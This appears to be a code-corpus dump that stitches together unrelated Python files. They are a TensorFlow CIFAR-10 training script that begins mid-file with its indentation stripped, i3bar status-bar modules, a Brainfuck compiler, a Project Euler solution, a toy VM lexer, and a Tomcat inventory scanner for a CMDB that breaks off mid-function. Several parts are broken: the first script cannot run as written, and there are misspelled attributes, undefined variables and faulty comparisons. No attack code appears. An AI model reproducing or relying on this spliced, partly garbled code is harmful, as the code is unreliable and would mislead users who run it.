N_FEATURES = 3072 # 3072 = 32*32*3
N_CLASSES = 7 # Number of Classes
N_FC1 = 512
N_FC2 = 256
BATCH_SIZE = 128
TEST_BATCH_SIZE = 5000
TRAINING_EPOCHS = 10000
DISPLAY_STEP = 50
SAVE_STEP = 1000
BASEDIR = './New_LOG/'
BETA = 0.01
cifar10 = read_dataset(DATASET_DIR, onehot_encoding=True)
logging.info('TRAIN: {}\nEVAL: {}'.format(cifar10.train.images.shape, cifar10.eval.images.shape))
def conv_layer(inpt, k, s, channels_in, channels_out, name='CONV'):
with tf.name_scope(name):
W = tf.Variable(tf.truncated_normal(
[k, k, channels_in, channels_out], stddev=0.1), name='W')
b = tf.Variable(tf.constant(0.1, shape=[channels_out]), name='b')
conv = tf.nn.conv2d(inpt, W, strides=[1, s, s, 1], padding='SAME')
act = tf.nn.relu(conv)
tf.summary.histogram('weights', W)
tf.summary.histogram('biases', b)
tf.summary.histogram('activations', act)
return act
def pool_layer(inpt, k, s, pool_type='mean'):
if pool_layer is 'mean':
return tf.nn.avg_pool(inpt,
ksize=[1, k, k, 1],
strides=[1, s, s, 1],
padding='SAME',
name='POOL')
else:
return tf.nn.max_pool(inpt,
ksize=[1, k, k, 1],
strides=[1, s, s, 1],
padding='SAME',
name='POOL')
def fc_layer(inpt, neurons_in, neurons_out, last=False, name='FC'):
with tf.name_scope(name):
W = tf.Variable(tf.truncated_normal(
[neurons_in, neurons_out]), name='W')
b = tf.Variable(tf.constant(0.1, shape=[neurons_out]), name='b')
tf.summary.histogram('weights', W)
tf.summary.histogram('biases', b)
if last:
act = tf.add(tf.matmul(inpt, W), b)
else:
act = tf.nn.relu(tf.add(tf.matmul(inpt, W), b))
tf.summary.histogram('activations', act)
return act
def cifar10_model(learning_rate, batch_size):
tf.reset_default_graph()
with tf.Session() as sess:
x = tf.placeholder(tf.float32, shape=[None, N_FEATURES], name='x')
x_image = tf.transpose(tf.reshape(x, [-1, 3, 32, 32]), perm=[0, 2, 3, 1])
tf.summary.image('input', x_image, max_outputs=3)
y = tf.placeholder(tf.float32, [None, N_CLASSES], name='labels')
phase = tf.placeholder(tf.bool, name='PHASE')
conv1 = conv_layer(x_image, 5, 1, channels_in=3, channels_out=64)
with tf.name_scope('BN'):
norm1 = tf.contrib.layers.batch_norm(conv1, center=True, scale=True, is_training=phase)
pool1 = pool_layer(norm1, 3, 2, pool_type='mean')
conv2 = conv_layer(pool1, 5, 1, channels_in=64, channels_out=64)
with tf.name_scope('BN'):
norm2 = tf.contrib.layers.batch_norm(conv2, center=True, scale=True, is_training=phase)
pool2 = pool_layer(norm2, 3, 2, pool_type='mean')
flattend = tf.reshape(pool2, shape=[-1, 8 * 8 * 64])
fc1 = fc_layer(flattend, neurons_in=8 * 8 * 64, neurons_out=N_FC1)
with tf.name_scope('BN'):
norm3 = tf.contrib.layers.batch_norm(fc1, center=True, scale=True, is_training=phase)
fc1_dropout = tf.nn.dropout(norm3,N_dp)
fc2 = fc_layer(fc1_dropout, neurons_in=N_FC1, neurons_out=N_FC2, last=True)
with tf.name_scope('BN'):
norm4 = tf.contrib.layers.batch_norm(fc2, center=True, scale=True, is_training=phase)
fc2_dropout = tf.nn.dropout(norm4,N_dp)
logits = fc_layer(fc2_dropout, neurons_in=N_FC2, neurons_out=N_CLASSES, last=True)
trainable_vars = tf.trainable_variables()
with tf.name_scope('loss'):
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=y)) + \
BETA * tf.add_n([tf.nn.l2_loss(v)
for v in trainable_vars if not 'b' in v.name])
tf.summary.scalar('loss', loss)
with tf.name_scope('train'):
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_step = tf.train.AdamOptimizer(learning_rate).minimize(loss)
with tf.name_scope('accuracy'):
correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar('accuracy', accuracy)
merged_summary = tf.summary.merge_all()
init = tf.global_variables_initializer()
saver = tf.train.Saver()
sess.run(init)
LOGDIR = BASEDIR + 'lr={:.0E},bs={}'.format(learning_rate, batch_size)
summary_writer = tf.summary.FileWriter(LOGDIR, graph=sess.graph)
eval_writer = tf.summary.FileWriter(LOGDIR + '/eval')
for i in range(TRAINING_EPOCHS):
batch_x, batch_y = cifar10.train.next_batch(batch_size)
sess.run(train_step, feed_dict={x: batch_x, y: batch_y, phase: 1})
if i % DISPLAY_STEP == 0:
run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
run_metadata = tf.RunMetadata()
s, lss, acc , _ = sess.run([merged_summary, loss, accuracy, train_step],
feed_dict={x: batch_x, y: batch_y, phase: 1},
options=run_options,
run_metadata=run_metadata)
summary_writer.add_run_metadata(run_metadata, 'step{}'.format(i))
summary_writer.add_summary(s, i)
for batch in range(cifar10.eval.num_exzamples // TEST_BATCH_SIZE):
test_acc = []
batch_x, batch_y = cifar10.eval.next_batch(TEST_BATCH_SIZE)
test_acc.append(sess.run(accuracy, feed_dict={x: batch_x, y: batch_y, phase: 0}))
eval_writer.add_summary(tf.Summary(value=[tf.Summary.Value(tag='eval_accuracy', simple_value=np.mean(test_acc))]), i)
logging.info('Iter={}, loss={}, trainging_accuracy={}, test_accuracy={}'.format(i+1, lss, acc, np.mean(test_acc)))
LOGDIR = saver.save(sess, LOGDIR + '/model.ckpt')
logging.info('Model saved in file: {}'.format(LOGDIR))
def main():
for lr in [1e-2]:#, 1e-3, 1e-4]: # Save some results with different learning rate(lr) and batch size(bs)
for bs in [64]:#, 128]:
logging.info('learing rate = {:.0E}, batch size = {}'.format(lr, bs))
cifar10_model(lr, bs)
if __name__ == '__main__':
main()
``` |
{
"source": "5225225/bar",
"score": 3
} |
#### File: bar/modules/df.py
```python
import signal
import linelib
import subprocess
class filesystem:
def __init__(self, device, total, used, free, mount):
self.device = device
self.total = total
self.used = used
self.free = free
self.mount = mount
def fsfromline(line):
x = line.split()
print(x)
return filesystem(x[0], x[1], x[2], x[3], x[5])
def handler(x, y):
pass
signal.signal(signal.SIGUSR1, handler)
signal.signal(signal.SIGALRM, handler)
ID = "df"
wanted = ["/", "/home/jack/mount/NAS/downloads"]
names = {"/": "/", "/home/jack/mount/NAS/downloads": "NAS"}
while True:
fslines = subprocess.check_output(["df", "-h"]).decode("utf-8").split("\n")
fslines = fslines[1:-1]
filesystems = []
for line in fslines:
fs = fsfromline(line)
if fs.mount in wanted:
filesystems.append(fs)
blocks = []
formatstr = "{}: {}/{}"
for item in filesystems:
blocks.append(formatstr.format(names[item.mount], item.used,
item.total))
linelib.sendblock(ID, {"full_text": " || ".join(blocks)})
linelib.sendPID(ID)
linelib.waitsig(1)
```
#### File: bar/modules/mpd.py
```python
import socket
import signal
import linelib
import time
import json
ID = "mpd"
def darken(hexcode, amount=.5):
r = int(int(hexcode[1:3], 16) * amount)
g = int(int(hexcode[3:5], 16) * amount)
b = int(int(hexcode[5:7], 16) * amount)
return "#{:x}{:x}{:x}".format(r, g, b)
def handler(x, y):
pass
signal.signal(signal.SIGUSR1, handler)
signal.signal(signal.SIGALRM, handler)
def mpd2dict(output):
x = output.split("\n")
d = dict()
for item in x[:-2]:
# MPD returns OK at the end, and there's a newline. This skips both of
# them.
key, val = item.split(":", maxsplit=1)
val = val.lstrip()
d[key] = val
return d
def sendline():
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("localhost", 6600))
except ConnectionRefusedError:
time.sleep(1)
return
except OSError:
time.sleep(1)
return
try:
version = sock.recv(2048)
except InterruptedError:
pass
assert version == b"OK MPD 0.19.0\n"
sock.send(b"currentsong\n")
currsong = mpd2dict(sock.recv(2048).decode("UTF-8"))
if currsong == {}:
return
sock.send(b"status\n")
status = mpd2dict(sock.recv(2048).decode("UTF-8"))
infodict = currsong.copy()
infodict.update(status)
artistcolour = "#a1b56c"
titlecolour = "#ac4142"
albumcolour = "#6a9fb5"
if infodict["state"] == "pause":
titlecolour = darken(titlecolour)
albumcolour = darken(albumcolour)
artistcolour = darken(artistcolour)
block = "<span foreground='{}'>{}</span>"
for item in ["Artist", "Title", "Album"]:
if item not in infodict:
infodict[item] = "Unknown {}".format(item)
fmline = "{} - {} - {}".format(
block.format(artistcolour,infodict["Artist"]),
block.format(titlecolour,infodict["Title"]),
block.format(albumcolour,infodict["Album"]),
)
formatcodes = fmline.replace("&", "&")
linelib.sendblock(ID, {"full_text": formatcodes, "markup": "pango"})
linelib.sendPID(ID)
linelib.waitsig(1)
click = linelib.getclick(ID).decode("UTF-8")
if click != "":
x = json.loads(click)
if x["button"] == 1:
sock.send(b"pause\n")
while True:
sendline()
```
#### File: bar/modules/ping.py
```python
import signal
import linelib
import subprocess
def handler(x, y):
pass
signal.signal(signal.SIGUSR1, handler)
signal.signal(signal.SIGALRM, handler)
ID = "ping"
toping = "8.8.8.8"
while True:
try:
raw = subprocess.check_output(["ping", "-c1", toping])
line = raw.decode("UTF8").split("\n")[1]
time = line.split(" ")[6][5:]
linelib.sendblock(ID, {"full_text": "{}ms".format(time)})
linelib.sendPID(ID)
linelib.waitsig(5)
except subprocess.CalledProcessError:
linelib.sendblock(ID, {"full_text": "NOT CONNECTED".format(time),
"color": "#ff0000"})
linelib.waitsig(1)
```
#### File: bar/modules/timeblock.py
```python
import linelib
import datetime
import signal
def handler(x, y):
pass
signal.signal(signal.SIGUSR1, handler)
signal.signal(signal.SIGALRM, handler)
while True:
linelib.sendblock("date", {"full_text": datetime.datetime.now().strftime(
"%Y-%m-%e %H:%M:%S"
)})
linelib.sendPID("date")
linelib.waitsig(1)
```
#### File: bar/modules/updates.py
```python
import signal
import linelib
import subprocess
def handler(x, y):
pass
signal.signal(signal.SIGUSR1, handler)
signal.signal(signal.SIGALRM, handler)
ID = "updates"
while True:
updates = subprocess.check_output(["/usr/bin/pacaur", "-Qua"]).decode(
"ASCII").strip().split("\n")
linelib.sendblock(ID, {"full_text": str(len(updates))})
linelib.sendPID(ID)
linelib.waitsig(1)
``` |
{
"source": "5225225/brainfuck-asm",
"score": 3
} |
#### File: 5225225/brainfuck-asm/brainfuck-compiler.py
```python
import sys
TMP_VARS = 4
MAX_MEM_SIZE = 256
# XXX PROGRAMS GETTING INPUT **MUST** HAVE NEWLINE AT END XXX
def convert(instr, converter):
out = ""
for ch in instr:
if ch in converter:
out += converter[ch]
return out
def simplify(prog):
while "<>" in prog or "><" in prog:
prog = prog.replace("<>", "")
prog = prog.replace("><", "")
return prog
def escapes(text):
inpt = list(text)
out = ""
while inpt:
ch = inpt.pop(0)
if ch == "\\":
esccode = inpt.pop(0)
if esccode == "n":
out += "\n"
if esccode == "\\":
out += "\\"
if esccode == "\s":
out += " "
else:
out += ch
return out
def runfunc(cmd, args):
global variables
global varcounter
global out
if cmd == "var":
variables[args[0]] = varcounter
varcounter += 1
if cmd == "space":
varcounter += int(args[0])
if cmd == "litprint":
lit = escapes(" ".join(args))
curr = 0
for ch in lit:
delta = ord(ch) - curr
if delta > 0:
out += "+"*abs(delta)
if delta < 0:
out += "-"*abs(delta)
if delta == 0:
pass
out += "."
curr = ord(ch)
runfunc("zero", ["tmp_litprint"])
if cmd == "strlit":
variables[args[0]] = varcounter
lit = escapes(" ".join(args[1:]))
out += ">"
out += ">"*varcounter
for ch in lit:
out += "+"*ord(ch)
out += ">"
out += "<"*len(lit)
out += "<"*varcounter
out += "<"
varcounter += len(lit) + 2
if cmd == "str":
variables[args[0]] = varcounter
strlen = int(args[1])
out += ">"
out += ">"*varcounter
for ch in range(strlen):
out += "+"
out += ">"
out += "<"*strlen
out += "<"*varcounter
out += "<"
varcounter += strlen + 2
if cmd == "split2":
source, var1, var2 = args
source = variables[source]
var1 = variables[var1]
var2 = variables[var2]
_ = """
Go to source
While source is not 0
decrement source by one
go to var1
increment var1 by one
go to var2
increment var2 by one
go to source
"""
out += ">" * source
out += "["
out += "-"
out += "<" * source
out += ">" * var1
out += "+"
out += "<" * var1
out += ">" * var2
out += "+"
out += "<" * var2
out += ">" * source
out += "]"
out += "<" * source
if cmd == "move":
source, dest = args
source = variables[source]
dest = variables[dest]
_ = """
Go to source
While source is not 0
decrement source by one
go to dest
increment dest by one
"""
out += ">" * source
out += "["
out += "-"
out += "<" * source
out += ">" * dest
out += "+"
out += "<" * dest
out += ">" * source
out += "]"
out += "<"*source
if cmd == "copy":
x, y = args
runfunc("split2", [x, "tmp_0", "tmp_1"])
runfunc("move", ["tmp_0", x])
runfunc("move", ["tmp_1", y])
if cmd == "inc":
var, count = args
vc = variables[var]
out += ">"*vc
out += "+"*int(count)
out += "<"*vc
if cmd == "dec":
var, count = args
vc = variables[var]
out += ">"*vc
out += "-"*int(count)
out += "<"*vc
if cmd == "break":
out += "#"
if cmd == "add":
x, y = args
runfunc("copy", [y, "tmp_2"])
runfunc("move", ["tmp_2", x])
if cmd == "mult":
x, y = args
runfunc("copy", [y, "tmp_3"])
runfunc("dec", ["tmp_3", "1"])
runfunc("while", ["tmp_3"])
runfunc("add", [x, x])
runfunc("dec", ["tmp_3", "1"])
runfunc("end_while", ["tmp_3"])
if cmd == "putch":
x = variables[args[0]]
out += ">"*x
out += "."
out += "<"*x
if cmd == "getch":
x = variables[args[0]]
out += ">"*x
out += ","
out += "<"*x
if cmd == "while":
x = variables[args[0]]
out += ">"*x
out += "["
out += "<"*x
if cmd == "end_while":
x = variables[args[0]]
out += ">"*x
out += "]"
out += "<"*x
if cmd == "if":
x = args[0]
n = 0
while "if_cond{}".format(n) in variables:
n += 1
runfunc("var", ["if_cond{}".format(n)])
runfunc("copy", [x, "if_cond{}".format(n)])
out += ">"*variables["if_cond{}".format(n)]
out += "["
out += "<"*variables["if_cond{}".format(n)]
runfunc("zero", ["if_cond{}".format(n)])
if cmd == "end_if":
n = 0
while "if_cond{}".format(n) in variables:
n += 1
cond = variables["if_cond{}".format(n-1)]
out += ">"*cond
out += "]"
out += "<"*cond
if cmd == "sub":
x, y = args
xv = variables[x]
yv = variables[y]
runfunc("copy", [y, "tmp_2"])
out += ">" * yv
out += "[-"
out += "<" * yv
out += ">" * xv
out += "-"
out += "<" * xv
out += ">" * yv
out += "]"
out += "<" * yv
runfunc("move", ["tmp_2", y])
if cmd == "zero":
x = args[0]
x = variables[x]
out += ">"*x
out += "[-]"
out += "<"*x
if cmd == "print":
s = variables[args[0]]
out += ">"*s
out += ">"
out += "[.>]"
out += "<"
out += "[<]"
out += "<"*s
if cmd == "read":
s = variables[args[0]]
eof = 10
try:
eof = int(args[1])
except IndexError:
pass
out += ">"*s
out += ">"
out += ",{}[{}>,{}]".format("-"*eof, "+"*eof, "-"*eof)
out += "<"
out += "[<]"
out += "<"*s
variables = {}
varcounter = 0
indents = 0
indent_width = 4
for x in range(TMP_VARS):
runfunc("var", ["tmp_{}".format(x+0)])
runfunc("var", ["if_cond{}".format(x+0)])
runfunc("var", ["tmp_litprint"])
out = "\n"
linenum = 1
for line in sys.stdin.readlines():
line = line.strip()
if line:
cmd, *args = line.split()
try:
if cmd == "end_while" or cmd == "end_if":
indents -= 1
out += " "*indent_width*indents
runfunc(cmd, args)
out += ": {}\n".format(line)
if cmd == "while" or cmd == "if":
indents += 1
except KeyError as e:
print("Unknown Variable name: {}".format(str(e)))
print("Line {}".format(linenum))
raise e
sys.exit(1)
except ValueError:
print("Not enough arguments")
print("Line {}".format(linenum))
sys.exit(1)
if varcounter >= MAX_MEM_SIZE:
print("Over Memory Usage")
print("Line {}".format(linenum))
sys.exit(1)
linenum += 1
out = simplify(out)
print(out)
``` |
{
"source": "5225225/project_euler",
"score": 3
} |
#### File: 5225225/project_euler/30.py
```python
POW = 5
pows = {}
pows10s = {}
for i in range(10):
pows[i] = i**POW
for i in range(10):
pows10s[i] = 10**i
def check(n):
return sum(
[
((x % pows10s[n] - (x % pows10s[n-1]))//pows10s[n-1])**5
for n in range(1, 7)
]
) == x
s = 0
x = 2
lim = (pows[9])*6
while lim > x:
if check(x):
s += x
x += 1
print(s)
``` |
{
"source": "5225225/pyvm-newer",
"score": 3
} |
#### File: 5225225/pyvm-newer/cmdio.py
```python
import sys
import json
def jsonencode(commands):
out = []
for item in commands:
out.append([item.line, item.opcode, item.arguments])
return(json.dumps(out))
def jsondecode(jsonstring):
out = []
for item in json.loads(jsonstring):
out.append(Command(item[0], item[1], item[2]))
return out
class Command:
def __init__(self, line, opcode, arguments):
self.line = line
self.opcode = opcode
self.arguments = arguments
self.size = -1
if False:
pass
elif self.opcode == "SET":
self.size = 4 # FORMAT: SET *x y
elif self.opcode == "JUMP":
self.size = 3 # FORMAT: JUMP *x
elif self.opcode == "IFE":
self.size = 7 # FORMAT: IFE *x *y *z
elif self.opcode == "ADD":
self.size = 5 # FORMAT: ADD/SUB *x *y
elif self.opcode == "GCHR":
self.size = 3
elif self.opcode == "PCHR":
self.size = 3
else:
print(str(self.line) + ": Invalid opcode of " + str(self.opcode))
sys.exit(1)
```
#### File: 5225225/pyvm-newer/lexer.py
```python
import json
import sys
import cmdio
from cmdio import Command
def decomment(commands):
output = []
for item in commands:
cmtpos = item.find("#")
if cmtpos == -1:
output.append(item)
else:
output.append(item[:cmtpos])
return output
if len(sys.argv) == 2:
infile = decomment(open(
sys.argv[1]).read().strip().split("\n"))
else:
infile = decomment(
sys.stdin.read().strip().split("\n"))
commands = []
for index, item in enumerate(infile, start=1):
line = index
if not item == "":
opcode = item.split(" ")[0]
arguments = item.split(" ")[1:]
while "" in arguments:
arguments.remove("")
intargs = []
for item in arguments:
if item.startswith("$"): # Convert hex values to decimal
intargs.append(int(item[1:], 16))
elif item.startswith("%"):
intargs.append(int(item[1:], 2)) # Convert binary to decimal
elif item.startswith("0"):
try:
intargs.append(int(item[1:], 8)) # Convert oct to decimal
except ValueError:
if item == "0":
intargs.append(0)
else:
raise
# The above code was to handle the case where a 0
# was being treated like a base specifier.
else:
try:
intargs.append(int(item))
except ValueError:
intargs.append(item)
cmd = Command(line, opcode, intargs)
commands.append(cmd)
sys.stdout.write(cmdio.jsonencode(commands))
``` |
{
"source": "523144419/autoScan4CMDB",
"score": 2
} |
#### File: autoScan4CMDB/tomcat/get_tomcat_ci.py
```python
from infodate.softinfo import *
reload(sys)
sys.setdefaultencoding("utf-8")
import xml.etree.ElementTree as ET
"""
Title: get_tomcat_ci.py
Dependent on: softinfo module
Time: 2018/1/29
function: Get tomcat infomation,and return the value into CMDB
e.g.
:return :
[
{
"AppName": "tomcat",
"InstallDir": "/u01/app/tomcat",
"JdkVersion": "1.8.0_171",
"jdbc": "jdbc:mysql://localhost:3306/mysql?autoReconnect=true",
"jmx": false,
"jvm_MaxMetaspace": null,
"jvm_MaxPerm": null,
"jvm_Metaspace": null,
"jvm_Perm": null,
"jvm_Xms": null,
"jvm_Xmx": null,
"maxThreads": null,
"minThreads": null,
"mode": "BIO",
"port": "8081",
"startup_location": "/u01/app/tomcat/bin/startup.sh",
"user": "cachecloud",
"version": "Apache Tomcat/8.5.33",
"webapps_files": "jenkins.war"
}
]
:type:
AppName : str
InstallDir : str
JdkVersion : str
dbInfo : str
jmx : bool
jvm_MaxMetaspace : str or null
jvm_Metaspace : str or null
jvm_MaxPerm : str or null
jvm_Perm : str or null
jvm_Xms : str or null
jvm_Xmx : str or null
maxThreads : str or null
minThreads : str or null
mode : str
port : str or null
startup_location : str or null
version : str or null
webapps_files : str or null
"""
LogFormat = '%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s'
logging.basicConfig(level=logging.INFO, format=LogFormat)
class get_tomcat_info(fifter):
"""
_init = fifter(self.cmd) 获取运行时Tomcat进程的基础数据
"""
def get_user(self, pid):
"""get pid of the startup tomcat"""
user = _init.username(pid)
return user
def app_name(self, name):
"""set appname"""
self.name = name
return name
def get_jdk_version(self, pid):
"""get userd java version"""
jdk_version = _init.jdkVersion(pid)
return jdk_version
def get_tomcat_port(self, tomcatBaseHome):
"""
解析server.xml文件获取Tomcat监听的端口号,判断配在文件中第一个itertag.tag=’Connector‘
:param tomcatBaseHome:
:return:
"""
server_xml_location = tomcatBaseHome + "/conf/server.xml"
if not os.path.exists(server_xml_location):
logging.error("{0}文件不存在,请检查,脚本已退出".format(server_xml_location))
return None
else:
serverXml_tree = ET.parse(server_xml_location)
serverXml_root = serverXml_tree.getroot()
for child in serverXml_root:
for itertag in child:
if itertag.tag == 'Connector' and itertag.attrib['protocol'] != 'AJP/1.3':
tomcat_http_port = itertag.attrib['port']
return tomcat_http_port
def get_tomcat_mode(self, tomcatBaseHome):
"""
解析server.xml文件获取Tomcat运行的模式,最大、最小线程数
:param tomcatBaseHome:
:return:
"""
tomcat_running_mode = ''
tomcat_http_MaxThreads = ''
tomcat_http_MinThreads = ''
server_xml_location = tomcatBaseHome + "/conf/server.xml"
if not os.path.exists(server_xml_location):
logging.error("{0}文件不存在,请检查,脚本已退出".format(server_xml_location))
return None
else:
serverXml_tree = ET.parse(server_xml_location)
serverXml_root = serverXml_tree.getroot()
for child in serverXml_root:
for itertag in child:
if itertag.tag == 'Connector':
tomcat_http_mode = itertag.attrib['protocol']
if tomcat_http_mode == 'HTTP/1.1':
tomcat_running_mode = 'BIO'
elif tomcat_http_mode == 'org.apache.coyote.http11.Http11NioProtocol':
tomcat_running_mode = 'NIO'
elif tomcat_http_mode == 'org.apache.coyote.http11.Http11AprProtocol':
tomcat_running_mode = 'ARP'
else:
tomcat_running_mode = None
attrib_dict = itertag.attrib
if 'maxThreads' in attrib_dict.keys():
tomcat_http_MaxThreads = attrib_dict['maxThreads']
else:
tomcat_http_MaxThreads = None
if 'minSpareThreads' in attrib_dict.keys():
tomcat_http_MinThreads = attrib_dict['minSpareThreads']
else:
tomcat_http_MinThreads = None
return tomcat_running_mode, tomcat_http_MaxThreads, tomcat_http_MinThreads
def get_tomcat_webapps(self, tomcatBaseHome):
"""
根据tomcat basehome拼接出webapps的绝对路径,获取webapps下的工程名称,会区分全量包和增量包的名称。
:param tomcatBaseHome:
:return: 全量包和增量包的名称
:type: str
"""
tomcat_webapps_location = tomcatBaseHome + "/webapps"
isdir = []
isfile = []
webapps_file = []
if not os.path.exists(tomcat_webapps_location):
logging.error("{0}文件不存在,请检查".format(tomcat_webapps_location))
return None
else:
ls_webapps = os.listdir(tomcat_webapps_location)
prohibit_file = ['manager', 'host-manager', 'examples', 'docs', 'ROOT']
for prohibitFile in prohibit_file:
if prohibitFile in ls_webapps:
ls_webapps.remove(prohibitFile)
for file_name in ls_webapps:
if os.path.isdir(os.path.join(tomcat_webapps_location, file_name)):
isdir.append(file_name)
elif os.path.isfile(os.path.join(tomcat_webapps_location, file_name)):
isfile.append(file_name)
else:
logging.error("无法判断 {0} 是文件或者文件夹,请确认".format(file_name))
for file in isfile:
file_split = file.split(".war")[0]
for dict_name in isdir:
if file_split == dict_name:
webapps_file.append(file)
isdir.remove(dict_name)
webapps_file.extend(isdir)
return ','.join(webapps_file)
def get_tomcat_version(self, tomcatBaseHome, username):
"""
通过执行tomcat自带的version.sh脚本获取当前tomcat的版本信息,使用sudo到进程启动用户执行version.sh,确保环境环境变量一致
:param tomcatBaseHome: tomcat安装目录
:param username: 当前进程启动用户
:return: tomcat版本信息 or None
"""
tomcat_version_sh = tomcatBaseHome + "/bin/version.sh"
tomcat_version_cmd = "su - " + username + " -c " + "\"" + tomcat_version_sh + "\""
tomat_version_dict = {}
if not os.path.exists(tomcat_version_sh):
logging.error("{0} 文件不存在".format(tomcat_version_sh))
return None
else:
ex_tomcat_version_cmd = commands.getstatusoutput(tomcat_version_cmd)
checkCode(ex_tomcat_version_cmd[0], tomcat_version_cmd, ex_tomcat_version_cmd[1])
tomcat_version_result = ex_tomcat_version_cmd[1].split("\n")
for result_part in tomcat_version_result:
tomcat_version = result_part.split(":")
tomat_version_dict[tomcat_version[0]] = tomcat_version[1]
if 'Server version' in tomat_version_dict.keys():
return tomat_version_dict['Server version'].lstrip()
else:
return None
def get_tomcat_jndi(self, tomcatBaseHome):
"""
通过ET模块解析context.com中的jndi配置,截取url连接串
:param tomcatBaseHome: tomcat安装目录
:return:
"""
if tomcatBaseHome is not None:
context_xml = tomcatBaseHome + "/conf/context.xml"
if not os.path.exists(context_xml):
logging.error("{0} 文件不存在".format(context_xml))
return None
else:
context_tree = ET.parse(context_xml)
context_root = context_tree.getroot()
for child_of_context_root in context_root:
for jndi_url in child_of_context_root.attrib:
if jndi_url == 'url':
# addr = child_of_context_root.attrib['url'].split("/")
addr = child_of_context_root.attrib['url']
return addr
return None
class get_proc_info(object):
""" 通过proc中的信息获取jvm和jmx的相关信息 """
def __init__(self, pid):
"""
:param pid: The running TOMCAT`s pid
"""
self.pid = pid
@property
def get_jvm_info(self):
"""
根据当前进程的pid,获取strings /proc/PID/cmdline命令的所有返回
:return: strings /proc/PID/cmdline命令的所有返回
:type: str
"""
_cmd_line = "strings /proc/{0}/cmdline".format(self.pid)
_ex_cmd_line = commands.getstatusoutput(_cmd_line)
checkCode(_ex_cmd_line[0], _cmd_line, _ex_cmd_line[1])
proc_jvm = _ex_cmd_line[1]
return proc_jvm
def get_jvm_info2list(self, jvm_info):
"""
根据strings命令的返回内容,将其拼接为list
:param jvm_info: strings /proc/PID/cmdline命令的所有返回,type为str
:return: strings /proc/PID/cmdline命令的所有返回,type为list
:type: list
"""
linelist = jvm_info.split("\n")
return linelist
def get_jvm(self, infolist):
"""
从get_jvm_info2list函数返回的list内容中,返回jvm参数,区分jdk1.7以下和jdk1.8
:param infolist:
:return: jvm
:type: tuple
"""
jvm_Xms = None
jvm_Xmx = None
jvm_Perm = None
jvm_MaxPerm = None
jvm_Metaspace = None
jvm_MaxMetaspace = None
for part in infolist:
jstart_Xm_part = re.compile(r"-Xms(.*)").match(part)
if jstart_Xm_part is not None:
jvm_Xms = jstart_Xm_part.group()
jvm_Xms = jvm_Xms.replace('-Xms', '')
jstart_Xm_part = re.compile(r"-Xmx(.*)").match(part)
if jstart_Xm_part is not None:
jvm_Xmx = jstart_Xm_part.group()
jvm_Xmx = jvm_Xmx.replace('-Xmx', '')
Jstart_XXMeta_part = re.compile(r"-XX:MetaspaceSize(.*)").match(part)
if Jstart_XXMeta_part is not None:
jvm_Metaspace = Jstart_XXMeta_part.group()
jvm_Metaspace = jvm_Metaspace.replace('-XX:MetaspaceSize=', '')
Jstart_XXMaxMeta_part = re.compile(r"-XX:MaxMetaspaceSize(.*)").match(part)
if Jstart_XXMaxMeta_part is not None:
jvm_MaxMetaspace = Jstart_XXMaxMeta_part.group()
jvm_MaxMetaspace = jvm_MaxMetaspace.replace('-XX:MaxMetaspaceSize=', '')
jstart_XXPer_part = re.compile(r"-XX:PermSize(.*)").match(part)
if jstart_XXPer_part is not None:
jvm_Perm = jstart_XXPer_part.group()
jvm_Perm = jvm_Perm.replace('-XX:PermSize=', '')
Jstart_XXMaxPer_part = re.compile(r"-XX:MaxPermSize(.*)").match(part)
if Jstart_XXMaxPer_part is not None:
jvm_MaxPerm = Jstart_XXMaxPer_part.group()
jvm_MaxPerm = jvm_MaxPerm.replace('-XX:MaxPermSize=', '')
return jvm_Xms, jvm_Xmx, jvm_Perm, jvm_MaxPerm, jvm_Metaspace, jvm_MaxMetaspace
def get_jmx(self, infolist):
"""
从get_jvm_info2list函数返回的list内容中,匹配-D开头的jvm参数,匹配-Dcom.sun.management.jmxremote.port参数判断该节点是否配在了jmx监控
:param infolist:
:return: True or None
"""
jmx = []
for part in infolist:
dstart_part = re.compile(r"-D(.*)")
find_dstart = dstart_part.match(part)
if find_dstart is not None:
jmx_D = find_dstart.group()
jmx.append(jmx_D)
for jmx_part in jmx:
jmx_D_split = jmx_part.split("=")
if jmx_D_split[0] == '-Dcom.sun.management.jmxremote.port':
jmx_set = True
return jmx_set
def get_tomcat_install(self, jmxinfo):
"""
查找Dcatalina.home的绝对路径
:param jmxinfo: jmx and other jvm param
:return: Dcatalina.home的绝对路径
:type: str
"""
for part in jmxinfo:
re_tomcat_install = re.compile(r"-Dcatalina.home=(.*)")
tomcat_install = re_tomcat_install.match(part)
if tomcat_install is not None:
tomcat_install_local = tomcat_install.groups(1)[0]
return tomcat_install_local
def get_startup_location(self, tomcatBaseHome):
"""
根据-Dcatalina.home,查找tomcat的startup.sh脚本的绝对路径
:param jmxinfo: -Dcatalina.home的绝对路径
:return: tomcat的startup.sh脚本的绝对路径
:type: str or None
"""
startup_location = tomcatBaseHome + "/bin/startup.sh"
if not os.path.exists(startup_location):
logging.error("{0}文件不存在,请检查".format(startup_location))
return None
else:
return startup_location
def get_netstat_db(self, dbRuslt=True):
"""
当get_tomcat_jndi函数返回值为None时,执行该函数,通过netstat命令获取和数据库建链情况
:param dbRuslt: 是否执行该函数,默认为不执行
:return:
"""
if not dbRuslt:
db_port = ["3306", "1521"]
for port in db_port:
_comm = "netstat -anp|grep -v grep |grep " + port + "|grep " + self.pid
_ex_comm = commands.getstatusoutput(_comm)
if _ex_comm[0] == 0:
_net_info = [x.split()[4] for x in _ex_comm[1].split("\n")]
_net_db = list(set(_net_info))
return _net_db
else:
return None
else:
return
class set_param2json():
""" 将所需字段封装到一个字典中 """
def __init__(self, func, tomcat_pid):
"""
:param func: get_tomcat_info对象
:param tomcat_pid: 单个tomcat进程的pid
"""
self.func = func
self.tomcat_pid = tomcat_pid
@property
def param2json(self):
"""
获取相关信息放入list中
:return: tomcat、jvm、jmx以及db的相关信息
:rtype: list
"""
user = self.func.get_user(self.tomcat_pid)
appname = self.func.app_name("tomcat")
jdkversion = self.func.get_jdk_version(self.tomcat_pid)
json_dick['JdkVersion'] = jdkversion
json_dick['user'] = user
json_dick['AppName'] = appname
